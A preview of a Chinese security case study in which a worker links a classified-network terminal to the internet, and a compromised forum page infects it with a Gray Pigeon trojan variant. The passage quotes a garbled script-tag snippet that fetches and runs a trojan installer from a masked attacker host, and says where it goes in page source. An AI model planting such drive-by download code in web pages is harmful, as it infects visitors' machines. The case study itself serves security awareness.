非法外联后木马引起的问题和解决办法.docVIP

  • 23
  • 0
  • 约5.22千字
  • 约 8页
  • 2020-03-12 发布于安徽
  • 举报

非法外联后木马引起的问题和解决办法.doc

非法外联后木马引起的泄密和解决办法 安全事件描述 某单位的网络包括内部网(涉密网)、外部网(公开网站等)两个部分。 出于安全的考虑内部网、外网进行了物理隔离。两个网络的数据不能相互通信。而涉密网也与因特网隔离,保证了涉密数据不外泄。 然而在日常工作中,涉密网中的的某个人员想在因特网上进行数据查询,考虑到去外网计算机中查询不太方便,该职员就打算在涉密网终端上通过连接外网网线的方式进行因特网访问。在该职员连接到因特网进行网页浏览时,去访问了某个经济论坛,正好该论坛被黑客进行了攻击,网页上被挂了利用“网页木马生成器”打包进去的灰鸽子变种病毒。 黑客利用“自动下载程序技术”,让该职员不察觉的情况下被种植了木马。(该技术在网页中利用SCRIPT LANGUAGE=icyfoxlovelace src= /SCRIPT http://***./1.exe/SCRIPT代码实现木马的自动下载, 代码中“src”的属性为程序的网络地址,本例中“http:// ***./1.exe”为黑客放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。把这段代码插入到网页源代码的/BODY…/BODY之间。而在该人员访问该网页时,用他的没打补丁的IE6打开后,该涉密终端IE的临时目录Temporary Internet Files文件夹中就会有一个“1.exe”文件

文档评论(0)

1亿VIP精品文档

相关文档